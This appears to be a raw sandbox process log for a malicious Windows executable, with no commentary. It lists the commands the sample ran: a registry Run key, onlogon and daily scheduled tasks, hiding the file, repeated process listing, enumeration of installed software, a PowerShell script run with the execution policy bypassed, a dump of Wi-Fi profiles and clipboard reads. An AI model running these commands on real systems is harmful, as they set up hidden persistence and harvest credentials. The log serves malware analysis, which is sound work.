C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupFC5uoY /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Moyetu_bEtaa.exe /f"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupFC5uoY /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Moyetu_bEtaa.exe\" /F /rl highest"

C:\Windows\system32\cmd.exe

cmd /c schtasks /create /sc onlogon /tn WindowsDriverSetupFC5uoY /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Moyetu_bEtaa.exe\" /F /rl highest

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v WindowsDriverSetupFC5uoY /t REG_SZ /d C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Moyetu_bEtaa.exe /f

C:\Windows\system32\schtasks.exe

schtasks /create /sc onlogon /tn WindowsDriverSetupFC5uoY /tr \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Moyetu_bEtaa.exe\" /F /rl highest

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Moyetu_bEtaa.exe\"""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "attrib +h +s \"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Moyetu_bEtaa.exe\""

C:\Windows\system32\attrib.exe

"C:\Windows\system32\attrib.exe" +h +s C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Themes\CachedFiles\Moyetu_bEtaa.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -Command "& { $Action = New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\Moyetu_bEtaa.exe' $Trigger = New-ScheduledTaskTrigger -Daily -At '12:00PM' Register-ScheduledTask -Action $Action -Trigger $Trigger -TaskName StartCacaTask }"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\tasklist.exe

tasklist

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "tasklist"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\7-Zip"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\AddressBook"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Connection Manager"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DirectDrawEx"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\DXM_Runtime"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Fontcore"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE40"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE4Data"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IE5BAKEX"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\IEData"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MobileOptionPack"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 105.0.3 (x64 en-US)""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Mozilla Firefox 105.0.3 (x64 en-US)"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService""

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MozillaMaintenanceService"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MPlayer2"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ProPlusRetail - en-us"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\SchedulingAgent"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VLC media player"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\WIC"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{37B8F9C7-03FB-3253-8781-2517C99D7C00}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5740BD44-B58D-321A-AFC0-6D3D4556DD6C}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{64A3A4F4-B792-11D6-A78A-00B0D0180381}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{662A0088-6FCD-45DD-9EA7-68674058AED5}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{6DB765A8-05AF-49A1-A71D-6F645EE3CE41}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{77924AE4-039E-4CA4-87B4-2F64180381F0}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{77924AE4-039E-4CA4-87B4-2F64180381F0}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-007E-0000-1000-0000000FF1CE}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0000-1000-0000000FF1CE}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{90160000-008C-0409-1000-0000000FF1CE}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CB0836EC-B072-368D-82B2-D3470BF95707}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}""

C:\Windows\system32\reg.exe

C:\Windows\system32\reg.exe QUERY "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{CF2BEA3C-26EA-32F8-AA9B-331F7E34BA97}"

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -NoProfile -File "C:\Users\Admin\AppData\Local\Temp\cK6J4I8K7LyV_temp.ps1""

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -Command "& {netsh wlan show profile}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -NoProfile -Command "& {powershell Get-Clipboard}"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

